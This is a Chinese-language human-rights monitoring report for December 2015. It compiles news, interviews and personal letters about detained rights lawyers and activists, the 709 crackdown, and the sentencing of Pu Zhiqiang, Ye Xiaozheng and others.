本網上期報告中對中共當局使用超期羈押、酷刑及不許取保候審迫害折磨異議人士和人權捍衛者的行徑予以了系統的揭露，報告引起了各個方面強烈反響。而中共當局從11月開始對羈押人權捍衛者的審判節奏也明顯加快，11月一共判決13人；12月一共判決3人，釋放8人。
2015年12月1日至2015年12月30日，中共當局在本月內一審判決3人，這3人
包括：傅志彬、浦志強、葉曉崢。釋放8人，為浙江溫州教案的王運顯、程超華、周愛平、周劍、黃曉遠、康孝友、劉鵬、方縣桂。這11人將不再出現在本期報告
中。（在最後的附錄中仍有11人的介紹）傅志彬、浦志強、葉曉崢3人具體判決情況如下：
江西傅志彬「非法經營」罪被判刑1年零8個月，罰金15萬。
浦志強涉嫌「煽動民族仇恨罪、尋釁滋事罪」案12月22 日宣判：執行有期徒刑3年，緩刑3年。現在已經出獄。
廣東葉曉崢「尋釁滋事罪」2015年12月29日被判18個月監禁。

綜合本期名單信息，我們可以總結以下幾點：
1、人權律師遭打壓嚴重，被關押的18名人權律師本月有3人被釋放，現在還有15名被繼續關押。
15名人權律師包括：夏霖、紀斯尊、唐荊陵、李和平、李春富、黃力群、謝陽、王全璋、王宇、隋牧青、謝遠東、謝燕益、周世峰、李姝雲、張凱。除夏霖、紀斯尊、唐荊陵3人外，其他12人是709大抓捕律師事件中和之後被抓捕或強迫失蹤的。本月浦志強、劉鵬、方縣桂得以釋放。
709後被抓捕的律師基本被當局採取所謂「指定居所監視居住」予以秘密關押。「指定居所監視居住」是繼廢除勞教之後，取代勞教功能的又一項公安部的部門權力。它的可怕之處，不是時間，而是地點的指定。這是法外失蹤，是秘密關押的另一種形式。
這些律師多被當局指控「涉嫌煽動顛覆國家政權」罪，這完全是當局為了阻止其律師會見他們的手段。所有這些人至今沒有一個會見過律師，外界也不知道他們被關押的地點。
2、超期羈押已成為當局慣用的手法。

3、酷刑和虐待普遍存在。不予「取保候審」就醫治療，成為當局對付人權捍衛者的一種極不人道的懲罰措施。
當局對被羈押的人權捍衛者的酷刑和虐待普遍存在。而許多遭到酷刑的人權捍衛者如郭飛雄、孫德勝、黃文勳、袁小華、袁兵等對其所遭酷刑都曾委託律師進行控告。
4、此次因「圍觀聲援浦志強」案被抓的7位人權捍衛者中，有4位是女性。近年來，人權捍
衛者中女性公民佔了極大的比例及很重要的地位，很多維權事件中都能看到女性堅定的身影。近年來因捍衛人權而遭受打壓迫害、刑拘、判刑的女性也是越來越多
多，如高瑜、劉萍、賈靈敏、王宇等等。
5、當局開始了對勞工維權的全面打壓，繼劉少明被抓6個月後，本月又有7名勞工NGO被抓捕並刑拘，並且繼續使用以官媒對其進行污名化的卑鄙手段對勞工群體進行輿論上的污名化。
唐志順案案情通報：內蒙興安盟當局拒絕承認關押
2015
年12月28日，覃臣壽律師到天津市河西看守所要求會見唐志順，經警察查詢後告知唐沒有關押在該看守所；29日，律師到興安盟公安局，核驗證件的警察看到
是唐志順的律師後通報給領導時非常緊張，說你們辦的案件律師來了快點下來。後有領導模樣的人來索取授權委託書和律師證複印件，要求律師回去等消息。下午律

安局來電話告知說唐志順不歸他們管並且涉及國家秘密就掛掉電話。後律師離開檢察院後通過申通快遞分別郵寄控告書給興安盟檢察院和內蒙古檢察院。同日，唐志
順母親和妹妹也到朝陽區檢察院提交控告常營派出所違法扣押電腦之事，檢察院拒絕接收材料，口頭告知說回去等消息。
而此前的2015年12月21日，辯護律師覃臣壽向公安部、天津公安局、內蒙古興安盟公安局提交《基於人性人道人權的申請》，提出四點要求：
1、書面告知律師（家屬）唐志順被關押於何處，辦案部門及人員、涉嫌罪名等；
2、保障律師能夠與唐志順會見及通訊；
3、保障其身體健康、能夠持續提供有效藥物治療甲亢，提供足夠衣物禦寒，保障其足夠睡眠及食物；
4、書面保證其不受到刑訊逼供等酷刑對待、不被強迫失踪等。至今未獲答复。
張博樹：一份了不起的公民宣言 ── 讀郭飛雄上訴狀
作為勇敢的人權行動者，郭飛雄早已為海內外所知曉。最近一篇《憲政民主政體革命為什麼必須──郭飛雄上訴狀》又向人們揭示了這位行動家思想者的一面。2015年11月27日，廣州市天河區法院以「聚眾擾亂公共場所秩序」和「尋釁滋事」兩項罪名，判處郭飛雄有期徒刑六年。
一週後，郭飛雄的上訴狀問世，洋洋灑灑近3萬言，除駁斥法院判決的荒誕無理外，竟有四分
之三的篇幅是在正面闡述上訴者關於「憲政民主政體革命為什麼必須」的政治主張。這樣的「上訴狀」大概聞所未聞，但它卻是新極權統治下一位中國公民的政治宣
言，是轉型中國一份珍貴的思想記錄。
郭指出，中國反民主的黑暗勢力把憲政民主制度文明視為「基本惡」，多年來，他們一慣宣揚的論調是，憲政民主是西方舶來品，不符合中國國情。
廣東惠州人權捍衛者葉曉崢（網名「湖面一舟」) 今被以尋釁滋事罪判刑一年6個月
2015年12月29日星期二，本網獲悉：廣東惠州人權捍衛者葉曉崢（網名「湖面一舟」) 今被廣東省惠州市惠城區法院以尋釁滋事罪判刑一年6個月。
葉曉崢去年因為支持香港佔中，2014年12月12日，惠州市惠城區公安分局國保闖入他
家，調查他身穿印有「人民恐懼政府即為暴政」字樣的黑衣，以及與多位朋友在家中聲援香港「佔中」之事。公安抄走其個人手機、電腦等物品，隨後以涉嫌「尋釁
滋事」將其刑拘。2015年1月17日被惠州檢察院批捕，2015年6月18日被起訴到惠州市惠城區法院。
2015年7月23日，廣東維權人士葉曉崢「尋釁滋事」一案曾在惠州市惠城區人民法院第
一審判庭開庭，未當庭宣判。葉曉崢因去年聲援港人爭取真普選被搆陷以「尋釁滋事罪」逮捕，但起訴的卻是以葉曉崢發帖譏諷博羅某公安局長及披露市民楊金華因
接待訪客而遭警方騷擾為犯罪事實。
葉曉崢是廣東惠州活躍維權人士，早年曾在國內某網站做編輯，因發表異議言論被迫辭去工作。後長期熱心助人維權，監督公權，宣揚民主憲政。多次參加爭取自由民主的政治活動。曾因參與反對惠州汽車年票制，被惠州警方兩次行政拘留。
惠州網民挺佔中被判囚18個月將提上訴
廣東惠州社會活動人士、網名「湖面一舟」的葉曉崢，12月29日上午被惠州市惠城區法院
以「尋釁滋事罪」判刑18個月。葉曉崢委託的辯護人劉浩律師在宣判後告訴記者，他對於法庭突然宣判感到奇怪：「今天本來是通知我們來開庭，就說有公訴人提
交的一些證據材料需要進行質證。上一次開庭是在大半年之前，以為案件很快有判決結果，但是一直沒有結果。結果他們通知稱有新的材料進行質證，質證以後他們
就進行宣判」。
記者：你們沒有想到今天會宣判？
回答：沒有想到。本來他們給當事人家屬的電話裡面談到審限，要到明年的3月18日。但是延期審理的決定沒有通知律師。
葉曉崢的妻子鐘女士對丈夫被判刑感到無奈。她說，將提出上訴：「判決一年半（刑期），（控方）所謂證據還是沒有體現出來，因為『一舟（葉曉崢）』是無罪的，他只不過按照事實發了帖子，聲援佔中抓他的。應該會上訴」。
記者：家屬這邊進去了幾個人旁聽？
回答：家屬就我一個人，家屬和朋友一起進去了四個人。
去年12月12日，惠州市惠城區公安分局國保闖入葉曉崢家，調查他身穿印有「人民恐懼政
府即為暴政」字樣的黑衣聲援香港「佔中」行動。公安抄走其個人手機、電腦等物品，以涉嫌「尋釁滋事」
將他刑拘二十天後，又由惠州檢察院批捕。今年7月23日及8月7日，該案兩度開庭。不過，起訴書中的主要指控並未涉及聲援香港「佔中」，而是以葉曉崢發帖
譏諷廣東博羅縣某公安局長及披露居民楊金華因接待訪客而遭警方騷擾為犯罪事實。
旁聽宣判的公民老楊告訴本台，上午十點鐘開庭不久法官就做出宣判：「法庭裡面留下五個位子給我們，旁聽的有二、三十個人，但都是他們安排的人員。今天開庭，他們增加了幾條所謂證據，然後就說構成尋釁滋事罪」。
被告人葉曉崢的代理律師劉浩稱，他為當事人做的是無罪辯護：「今天下午我如果有時間就去看他，爭取聽一聽他的意見。一直以來，一舟當然認為自己是無罪的，如果判他有罪，他會堅持上訴。原來他就有這個立場，至於到底如何等他新的決定」。
葉曉崢因多次參與民間活動而被公安拘留。去年5月16日，他曾因到博羅圍觀民眾抗議建垃圾焚燒電廠，被八名警察帶走。前年還因三個網帖被認定屬於「製作、散佈謠言」、「擾亂公共秩序」，被處以行政拘留十天。
劉浩說：「一舟我跟他溝通過，他也對大家都關注表示感謝，希望類似的冤假錯案愈來愈少，言論自由能夠得到應有的保障」。
廣東另一位因言被入罪、網名「尖刀」的梁勤輝被控「煽動顛覆國家政權罪」一案，11月13日在廣州中院審結，法官將擇期宣判。
首名大陸公民疑撐香港民運被構陷入獄
葉曉崢的妻子鍾永梅認為判刑太重，稱這是構陷的罪名。她又說，丈夫和家屬會上訴到底。
鍾永梅說：我覺得他沒有罪，（判刑）重了。那5位證人提供的資料，說是看到他(葉曉崢)的帖才去遊行，他(葉曉崢)說是假的，是被構陷的。
因涉及聲援香港佔領行動而遭到抓捕關押的大陸支持者逾百人，及後有至少8人至今仍然關押。其中廣東網友謝文飛、王默，均被控“涉嫌煽動顛覆國家政權罪”的案件，上月19日開庭後擇日宣判。
旁聽葉曉崢案件的福建網友孫濤表示，去年的10月3日，他跟謝文飛、王默等人一起在街頭拉橫額聲援香港，及後他被關押了約1個月獲釋，但謝文飛和王默卻繼續被拘禁，後來更以“煽顛罪”進入司法程序。因而孫濤擔心，葉曉崢因言入罪，走上街頭的謝文飛和王默，不排除會被重判。
孫濤說：她（當局）只不過找不到入罪的證據，只能在網絡上這方面來讓他坐牢。而謝文飛他們是以“煽顛罪”拘捕的，不是以普通的尋釁滋事罪。我個人擔心會判得更重，因為“煽顛罪”隨便判都要好幾年。
大抓捕後再受打壓 敏感案件律師遭解約
大陸繼709大抓捕維權律師後，當局再以不同方式，阻撓律師代理被捕律師的案件。山東有律師事務所疑受到壓力，與曾代理敏感案件的律師解約。
為阻撓律師參與涉及大抓捕維權律師的案件，山東當局統籌安排全方位施壓，國保、司法局、
律師協會輪流登場，以不同的方式向正常代理案件的律師施壓。曾經為北京鋒鋭律師事務所的王宇律師被捕一事而奔走的山東律師馮延強，最近轉換律師事務所時就
受到干預，被逼與事務所解除合同。
馮延強接受本台訪問時稱，目前正在找新的事務所，但在當局的人為干涉下，能否有律師事所願意接納尚不知。
馮延強：當時那個律師事務所的主任他說得很恐怖，說有人要關掉他們律師事務所，有可能會被神秘殺掉。說得很恐怖。談到為了保護律師事務所，然後我就簽了一個解除勞工合同的協議了。
馮延強表示，不清楚是否因為他替709大抓捕受逼的律師奔走，而遭到打壓；但承認警方及司法局曾多次找他談話，他不願意透露談話的內容，只是說感到很大壓力。
馮延強：能不能順利找到律師事務所，要看濟南市司法局、公安局，他們起很大的作用，如果我接受外媒採訪，可能讓他們聽到或者看到，會對我變更律師事務所帶來消極的影響，所以說我都是暫時不接受你的採訪。
馮延強早前代理王宇案，因當局向他的山東律師事務所施壓，令他無法代理。到後來又施壓，令馮延強中途退出對唐志順的代理。再後來，另外兩個律師李仲偉和襲祥棟亦疑受壓力，解除代理王全璋案，最新又傳出謝陽的辯護律師劉金濱亦不堪壓力解除代理。
除了馮延強被逼解除和事務所的合同之外，李仲偉律師據說也正面臨被律師所解除合同的風險。
廣州維權律師劉士輝接受本台訪問時稱，案件當事人委託律師，以及律師接受當事委託代理案件，是憲法和刑法賦予的權力，批評當局透過向律師事務所施壓，製造白色恐怖，令律師不敢代理一些敏感的人權案件，是對被告人權利、律師執業權和國家司法制度的嚴重侵害。
劉士輝：律師協會往往是充當官方的打手。你來年的年檢通不過，律師年檢其實是懸在律師頭上的一把刀。還有你轉事務所我不幫你辦手續，到了律師所我進行遙控，讓你做不成，最後一招是就是羅織罪名來處罰你。
劉士輝有代理一些被當局視為敏感的人權案件，如郭飛雄案等，他所在的廣東經國律師事務所，曾於2009年8月收到廣州司法局發出的《行政處罰聽證告知書》，指劉士輝涉嫌在一宗房產糾紛案中私自收費，最終事務所與劉士輝解約，司法局對他作出一個停止執業9個月的行政處罰。
709大抓捕事件，以王宇和包龍軍律師夫婦被警方抓捕為起點，在短短的兩個月時間內，至少有300多人被強制約談、非法傳喚、非法抓捕約談，其中有14位律師和多位民間人士被秘密羈押。
倪玉蘭：人權律師李和平
2015年7月10日，李和平律師遭到天津警方的抓捕，並對他的住宅進行了查抄。和平律師失踪後不久，他的弟弟李春富律師也遭到抓捕，兄弟倆失踪已近6個月，他們的安危冷暖，令人擔憂。
「旗幟鮮明支持香港人民爭取普選」 河北起訴裴國動
今天夜間，河北承德圍場縣杜豔偉【河北承德裴國棟拘留期滿轉刑拘】致電中國天網人權事務中心：「旗幟鮮明支持香港普選」，圍場縣尋釁滋事罪起訴裴國動。

電稱；2015年10月29日，河北省承德市圍場縣寶元棧鄉35號村12組裴國動在北京西站附近，被北京市海淀區羊坊店派出所民警強行帶回所裡，後被圍場
縣新撥派出所接回，隨即被關進圍場縣看守所，行政拘留15日。11月14日上午9時轉為刑拘，11月21日批捕，12月10日法院以涉嫌尋釁滋事罪起訴。
起訴書稱：2014年10月1日，裴國動夥同冉宗碧等人在北京市豐台區呂村裴富貴暫住地門口舉「旗幟鮮明的支持香港人民爭取民主普選的鬥爭。」
裴國動轉為刑拘後開始絕食，至今已一個多月了，12月16日，代理律師李威達到達圍場，看守所告知裴國動因絕食在醫院，於是律師在醫院會見的受害人裴國動。目前，裴國動關押在圍場縣醫院裡一個專門的房間，屋裡裝有監控，門窗都安有防護鐵網，家屬想去看看遭拒絕。
河南省平頂山市三名退役軍官被拘留十五日
今天晚上，本工作室獲悉，河南省平頂山市三名退役軍官被以「策劃集會、遊行」「煽動軍轉人員上訪」被拘留。
據70歲的史書卿告訴本工作室，12月9日，他和平頂山市共十六名在企業工作過的退役軍
官在平頂山市一家名為老門樓土家菜館聚會吃飯，當時大家商量了下在北京狀告人社部的事，結果平頂山市公安局中興路分局眾多警察衝進來將他們帶到平頂山市一
家賓館，一下開了十六個房，每名退伍軍人一個房，被分別審問。
最終史書卿、張保昌、朱玉亭三人被以策劃非法集會、示威、遊行被行政拘留十五日。史書卿因年齡超過七十歲被不予執行，張保昌、朱玉亭則被送到平頂山市拘留所執行拘留，直到本月24日才出來。
史書卿說這次抓捕他們的背景是12月14日-15日，上海合作組織成員國政府首腦（總理）理事會第十四次會議在鄭州會展中心舉行。

今天和前幾天一樣，大清早起來，給女兒喂了稀飯，還是要送去朋友那裡，讓他妻子幫忙帶女兒。
女兒比前幾天乖了很多，吃的也比前天要多一點點。
兒子每天中午回家還是在外面吃快餐，因為我去上班後家裡沒人給兒子做飯，所以只能委屈兒子了。
今天上午上班，大概十點鐘，我接了個電話，電話是警察打來的，說在廠門口等我，要和我見個面（我以為他會給我帶來好消息），就匆匆的趕到廠門口。
見面後，我問他是不是我老婆那邊有好消息了？他說：你老婆那邊挺好的，挺樂觀的。我們聊
了一會，他說：你老婆又寫信給你了，但是這回我就不給你了，信的大概意思有三點，一、是叫你不用給她（妻子）請律師了，二、是把小孩送福利院，或是花三千
塊錢請個保姆幫帶，三是什麼？他說記不得了。
我聽了，心裡有點不爽，就對他說，請不請律師，你回去和你們領導說，叫我老婆自己和律師
說，我現在對我老婆寫的信是不會相信的，如果她（妻子）真的不請叫她自己和律師說，然後讓律師告訴我，我才會相信。關於叫我把女兒送福利院這個事，你就不
用說了，我是百分百不會把我女兒送去的。
他（警察）說，讓你老婆拍個視頻和你說，你相信了吧。我說，不相信，只有和律師說了，律師告訴我我才會相信。我們大概聊了有半小時，我說，現在車間很忙，如果沒有別的事，我先回車間做事了。
中午吃完飯，我一直在想他和我說的話，我越想越不能理解，哪有自己親父母同意把自己的親孩子送福利院的，就算自己真的負擔不起，也不會這樣做，那可是自己的親骨肉啊。能這樣的人，真不配做父母。
回想起來，老婆被帶走快一個月了，律師仍然不給見面。但無論發生什麼事，我還是想大聲的和老婆說：老婆，不管你受到多大的壓力，你都要挺住，我在家裡把兒子，女兒照顧好，你不用擔心我們，我們在家裡等你歸來。
湖南12人自焚喝藥中南海 刑拘2人押返10人
今天上午，湖南省婁底市婁星區大科辦事處柳紅貴【湖南柳紅貴遭強拆 上訪獲刑8月】致電中國天網人權事務中心：湖南婁底12人中南海請願，刑拘2人押返10人。
湖南省漣源市吳連才、龍喜莊、王華興、肖清花、匡鳳飛、肖良、肖亮、吳葵香、吳顯申、廖
細桂等12訪民曾數次逐級進京反映各自訴求無果。2015年12月24日，12人前往中南海以自焚、喝農藥等方式抗爭【湖南婁底10訪民中南海找清官被
擒】，以尋釁滋事罪刑事拘留4人，其中一位塵肺晚期患者、一位心律失常冠心病患者拒收。
2015年12月25日，當局組織黑社會團夥11人車牌為京EB2557的大型商務面包車將我們10人以每人5500元價格綁架到漣源公安局，途中運行達30個小時左右.不准吃飯.不准上廁所。
目前，尚有2人北京刑拘，龍喜莊在押湄江栗山橋賓館。
圍觀浦志強案遭抓的遼寧訪民盛蘭福被刑拘
12月14日，本網報導的遼寧大連訪民盛蘭福，在浦志強庭審現場被抓捕失聯。
一直放心不下盛蘭福的在京訪民王申紅和翟社利今天到北京市豐台區看守所詢問得知盛蘭福被刑拘於此。但看守所以看守所不缺吃穿為由拒絕他二人為盛蘭福存錢存物。

東把我們趕走。之前朝陽分局將我們趕到海淀，海淀分局趕我們到昌平，昌平分局又趕我們到大興。在北京大興，阿生被清源派出所以沒有暫住證為由，抓到派出所
院子下跪毆打，在40度的太陽下暴晒，清源派出所姓魏的黑警給阿生往眼睛噴辣椒水，並說“舒服嗎？半小時後再給你來一次。”警方主要是迫害我，阿生為了保
護我，被他們抓了。之後，李和平律師、劉曉原律師、彭點鼎和BBC記者去了大興分局，阿生才得以釋放。
我們在大興時，一個月最多搬十次家；黑警威脅每家房東，致使沒有一個房東敢收我們。一個
東北的高大哥得知此事，說：“黃燕，你和阿生搬到我們的出租房去住，我有關係，他們不敢把你怎麼樣。”我和我丈夫搬去了，幾天后高大哥敲開門，雙眼淚汪汪
地說：“黃燕，高大哥對不起你們，這是你們的房費，我給你們兩天時間找房。”寒冷的北京，我和丈夫被逼得搬進了即拆未拆的拆遷房中，沒水、沒電，也沒煤取
暖做飯；水到半里外的老鄉家用電動三輪車去拉。
十年來我至今沒有孩子。懷第一個孩子時被亞運村派出所楊志剛惡警打得流產，場景我不願意再回憶；第二個孩子在昌平沒保住；第三個孩子在大興沒保住。我丈夫的眼睛被傷後，一見油煙就流淚。
高律師，我、阿生和朋友們真想見您一面！我知道這很難，在沒有見到您之前，可能我們就會被失踪、被綁架；而這也正是您的遭遇。
在北京居無寧日的生活使我患了重症。回到荊州後，我繼續被綁架、軟禁、丟監，至今都沒有
斷過。大閱兵前，8月25日深夜，我在湖北麻城火車站被綁架。當時我準備前往唐山，一個朋友叫我過去看看門面，看能否做點什么生意。晚上11點40分的火
車，11點20分，我被幾個便衣綁架走。之後，他們開了一夜的車，將我押回荊州，說我是國家二級監控對象，國家安全部門禁止我進北京。當時我血糖上升28
點之多，高出常人五倍，我被送到醫院，在醫院被軟禁了25天。
今年7月15日我從廣州回到荊州，到後便被騙到居委會,被警方抓走,訊問我回荊州有什麼目的。之後一段時間，我躲到朋友家，朋友家也被警方搜查。8月25日深夜，我在湖北麻城火車站再次被警方綁架，押回荊州，至9月20日才被釋放。
今年11月26日，是我生日，當時我和阿生在廣州。午飯後，我和阿生出門，剛下樓一幫便
衣就如狼似虎撲上來，一句話也不說，將我們按倒在地，雙手反銬。我大聲呼喊：“黑社會流氓綁架癌症患者！”我們夫妻被押到荔灣區芳村石圍塘派出所，六七個
便衣拿手機對我們亂拍照。這次，他們定我是“傳播恐怖信息罪”。他們審問我，從下午1點10分審到第二天凌晨5點；晚上8點，他們又將我拉到廣東佛山順德
杏壇派出所連夜審訊。順德公安局局長指示給我定的罪名是“爆炸罪”。12月2日律師來見我時，我才知道，他們給我重定的罪名是“故意傳播虛假恐怖信息
罪”。
12月3日提審我時是“傳播虛假恐怖信息罪”，但12月14日再次提審時，我的罪名又變成了“爆炸罪”，並增加了一項“襲警罪”——在派出所打警察。我雙手被反銬著，我能打傷警察嗎？爆炸罪？在哪炸過？時間、地點？炸人還是炸物？炸火車還是炸機場？
此信還沒有寫完。高律師，因著我怕連累我丈夫吳桂生，十年來一直到我檢查出癌症時，我們
才拿結婚證。北京大興清源派出所當年把我丈夫抓去毒打，說我是高危人物，要阿生和我分手，阿生沒有答理他們。患難見真情，丈夫對我不是一般地好，可惜的是

南昌大學前校長判無期徒刑 聲言遭前省委書記報復

西省南昌大學前校長周文斌案一審，南昌市中級法院周二（29日）宣判，受賄、挪用公款罪判處無期徒刑，剝奪政治權利終身，並沒收個人全部財產。提前獲知判
決結果的周文斌，在看守所寫下了“士可殺，不可辱”，表明將抗爭到底。由於案件出現激烈的庭辯，引起法律界的廣泛關注。
在周二的判決中，南昌市中院認為，周文斌受賄2111萬人民幣、30萬港幣、1萬美元、90萬元韓圜、購物卡2.4萬元、卡地亞手錶一只，挪用公款5875萬元；且不具有如實供述，真誠悔罪和積極退贓的行為。
但微信公號辯護人立即發表文章，列舉檢察院在案件中採取刑訊逼供、抓親人、威逼證人、栽贓、脅逼證人出庭翻供等違法行為，並批評江西當局對周文斌進行全面的構陷。至今為止，檢方並沒有找到所謂巨額受賄款項的下落。
在之前，案件一審的庭審過程，也是一波三折。去年12月9日南昌市中級法院開庭審理，周文斌幾乎全部否認檢方的指控，並指“這是江西省有史以來，最大的一宗經濟類的冤假錯案。”
在法庭上，周文斌採用概率論與數理統計、排列組合、誤差理論等，來論證公訴人的證據“荒謬”。此外，周文斌還當庭爆出，他是拒絕已落馬的原江西省委書記蘇榮，要求他以南昌大學的名義，收購蘇引進的港資中寰醫院，而遭到蘇榮報復。
庭審中，被指行賄的證人，包括有人大代表、政協委員的胡彪斌，他作證時稱沒有向周文斌行賄。據辯護人公號的文章透露，隨後已經身在國外的胡彪斌的弟弟被抓，財產被查封。他被逼回到國內在一審第二次開庭再作證，稱向周文斌行賄100萬。
今年3月4日，案件一審歷時3個月開庭完結，實際有效庭審時間為24天，創下全國職務犯罪案件庭審時間的最長紀錄。但6個月後，南昌市中院確定分管刑事審判的法學博士長譚紹木擔任審判長，全案重審。”原審判長高登紅因身體問題提出迴避”，不再參與審理。
在11月9日至17日的周文斌案第二次審判中，周文斌堅持否認受賄和挪用公款。但法院採納檢方的指控。
據廖曜中律師稱，案件對法律條款的濫用，刑訊逼供，法院不獨立等一系列問題，但辯護人的意見並沒有被採納，也不按刑事訴訟法的程式進行審理，令法律界非常擔憂。
廖曜中說：檢察院和法院，簡直就是串通一氣，這是中國司法的最大特點。且事實部分呢，你
像那個5000多萬的挪用公款，人家是為職工挪用的公款，這種不符合挪用公款的定義，但法院也認定。那些受賄的事實，大量的事實存疑，可是它卻認定。這次
刑訊逼供是很明顯的，也就是說檢察院這把刀子呢，它隨時對任何對手、它不喜歡的人、或者是上面所指使的人下手。也就是法院和檢察院完全不聽辯護人的合理的
建議。
另據辯護人公號透露，在宣判前4天，一審中的第二位審判長、南昌中院副院長譚紹木到看守所探訪周文斌，指自己人微言輕，並告知判決結果。這事再度引起法律界的關注，他們認為這是一宗被江西方面權力主導的審判。
周文斌案引起法律界的廣泛關注，廖曜中甚至認為，案件的意義不亞於浦志強案，但民間對此反應平平。他認為，這和中國社會法制觀念缺失、民間仇富仇官有關。
這個說法得到了雷登峰律師的應證，他認為，中國現有的體制注定了民間對官員缺乏信任。即使是有冤屈，也難以得到民間的同情。他解釋，法律人士的激烈反彈，是源於對法律底線的堅守。
雷登峰說：民間對官方它有一個仇官仇富的心理，不管你是不是被冤枉的，可能他們都覺得，
這個人活該。在我們這種體制下呢，當然，做官能清正廉潔的可能性確實不大，多少都有一點問題，所以老百姓的情緒也不是沒道理的。但是堅持從法律上能夠確實
充分地證明犯了罪，那麼他就應該被處理，那如果證據不充分的話，還是不應該處理，這是我們法律人最基本的認識。
據悉，在周文斌案審結後，這件案的審判長譚紹木被調離法院，而南昌中院拒絕對此發表評論。
浦志強案帶給我們的希望與勇氣 (艾未未)

年4月，一群中國便衣警察將我在北京機場綁架，然後把我帶到一個秘密地點拘留了81天。雖然在關押期間，大多數審問都集中在我的政治活動上，但被釋放之
後，政府卻捏造說我的公司偷稅漏稅，要求我交清240萬美元的稅款和罰金。我問他們為什麼這樣指控我，一名官員說，「不罰你，你也不會消停。」
為了澄清事實，爭取公正，我決定上訴。由於案子的敏感性很高，我聯繫了浦志強，他以敢為那些被中國專制政權打壓的政治活動人士辯護而著名。出於仗義，浦志強接下我的上訴案。他辦案條理清晰，邏輯明了，記憶驚人。
多年來，志強為很多記者、上訪者和人權活動者進行過辯護。他維護法制的行動，連同他的勇氣和出類拔萃的能力，令他成為一個政治迫害目標。他的影響力日增，中國政府視之為威脅。
浦志強在被關押了19個月之後，於12月14日在北京市第二中級人民法院以「煽動民族仇
恨」、「尋釁滋事」的罪名受審。檢方的指控基於浦志強在社交網絡上的七條微博。上周二，法庭宣布這些罪名成立，判處他有期徒刑三年，緩期三年執行。這一判
決意味着，他將永遠失去律師的身份——他多年來利用法律替無聲者發出聲音的平台也被摧毀。
這個判決好於預期，可能是因為國際社會的壓力產生了影響，但獲釋後他也不可能像正常人那樣的生活。警方會監視他的一舉一動，如果他在未來三年內繼續開展政治活動，就有可能隨時被捕入獄。
警方在2011年6月結束對我的羈押之後，扣押了我的護照，禁止我在互聯網上發佈任何文章。還禁止我接受媒體採訪。我工作室外的建築物和電線杆上安裝了監控攝像機，樓外還有警察駐紮。我要出門必須獲得許可，即使出了門，也有便衣緊跟着我。浦志強也會遭到類似的待遇。
我第一次見到浦志強是在2009年的夏天，當時他是四川作家譚作人的辯護律師。我不認識
譚先生，但我知道他開展過一項與我類似的公民調查。我們都試圖揭開一個真相：2008年5月發生的汶川地震中，有5000多中小學生死於倒塌的校舍中。這
在很大程度上是由於校舍的施工質量有問題。譚先生把他的調查結果張貼在網上，結果被警方逮捕。
作為譚的律師，浦志強來到我的工作室交流意見。他是一個身材高大的北方人，嗓音明亮沉穩。他說如果我出庭作證，我的調查結果對譚的辯護很有利。他的執着令我感動。我毫不猶豫地同意了。
譚先生受審當日的凌晨3點，警方突擊搜查了我住的酒店，並且野蠻地強迫我和我的同事們留在那裡，直到審判結束。我頭部受傷，危及生命。儘管志強進行了強有力的辯護，譚先生還是被判處了五年有期徒刑。
中國嚴重缺少能勇敢到為人權的普世價值而鬥爭的獨立律師。但浦志強不一樣。
1989年，身在北京的浦志強是政法大學的學生。他在天安門廣場上絕食抗議。他對我說，
政府命令坦克開進市裡的那天晚上，他和一個學醫的女生是最後撤出廣場的人。回宿舍的路上，他們在偏僻的巷子里迷路了。這證明是兩人的福氣：他們避開了在主
路上出沒的軍人對抗議者的隨意掃射。後來，那個女生成了浦志強的妻子。
浦志強從未停止呼籲政府平反「六四」。去年5月，他在參加了一場紀念六四25周年的私人
聚會後，被警方逮捕。我和他的朋友都沒想到他會被逮捕並被關押這麼久卻不開審。在此期間，調查人員仔細盤問他的同事，並徹底審查了他律師事務所的財務記
錄，希望用經濟罪名指控他。當這類企圖失敗後，他們只能訴諸於他的在微博上發的帖子。
浦志強是獨一無二的，但他的案子卻不是。自他被捕以後，很多人權律師都消失了。公眾和他們的家人都不知道他們被關押在何處，處境如何。他們沒有機會被探視，他們的子女被限制出境。我們可以想像到，在不久的將來，這些律師也會像浦志強一樣接受審判，並得到有罪判決。
在全世界都在滔滔不絕地談論中國的經濟實力時，誰都不應該忘記，它的崛起是以自由和人權為代價的。悲哀的是，中國國內外的很多人接受了司法體制屈從於黨的權力這個事實。
儘管如此，我拒絕麻木和習慣化。我不認為在中國就只能逆來順受。
浦志強受審期間，法院外面聚集了一大群勇敢面對警方騷擾的中國支持者和西方人。他們的對浦志強的支持給了我希望。面對來自強大的國家機器的威脅，一個人只需要在一生中大聲發出一次聲音，我們會戰勝恐懼，強迫這個政權做出改變。
廣州數十公民迎新年聚餐續倡導自由與和平抗爭

州數十公民12月27日舉行同城聚會，其中有人穿著印有維權律師隋牧青頭像的T恤衫，上寫「尋人啟事」，希望能早日見到這位仍被當局監視居住的維權律師。
參與者稱，當天是2015年的最後一個星期天，他們舉起三個手指分別代表希望、自由、抗爭，表示在新的一年中，將繼續爭取民主與憲政。

2015年的最後一次同城聚會，他們通過聚餐交流，回顧今年中國的人權狀況，展望即將到來的2016年。與會者稱，將要結束的2015年，中國的人權狀況
出現罕見的倒退，聲援香港佔中的維權人士遭到打壓，甚至判刑。眾多的維權律師被監禁，其家屬被限制出境。他們渴望2016年能迎來自由的曙光。
同城聚會的參與者劉四仿12月29日對本台表示，參加者有數十人：「為了迎接新年，吃一個飯，交流一下，對過去一年的歷程進行分享，還有對未來，新的一年展望，進行交流」。
記者：大概有多少人參加？
回答：四十人左右。還有幾位朋友臨時有事請，沒有能來。
現場圖片中，不少人身穿印有頭像的黑色T恤衫，上寫「尋人啟事」。對此，劉四仿說：「那個頭像是隋牧青律師的頭像，因為隋牧青律師現在失聯。709律師失聯，我們用尋人啟事來表達對當局生不見人，死不見屍這種做法的抗議」。
廣州民眾在中國近代及現代革命的歷史上，一直扮演重要角色，如1911年爆發的「三•二九」起義，拉開辛亥革命的序幕等。數年前的南方街頭運動，吸引了不少外省人到廣州落戶，投入推動自由民主及憲政的各類社會運動。
廣州網民賈榀29日對記者說：「27日是星期天，也是2015年的最後一個星期天，大家
約了很多朋友出來，舉行一個慶元旦、迎新年的聚餐，這次人數很多。而且剛好第二天，就是昨天是劉曉波的生日，當時就有人提議，在大家合照的時候舉三個手
指，代表希望、自由、抗爭。還表示祝劉曉波生日快樂，也是對他的聲援。有朋友拿出聲援隋牧青律師的文化衫發給大家。因為隋牧青7月10日被帶走至今沒有消
息，人都不知道在哪裡」。
參加同城聚會的有劉正青律師、網絡作家野渡及被羈押的維權人士唐荊陵的妻子汪豔芳等。汪
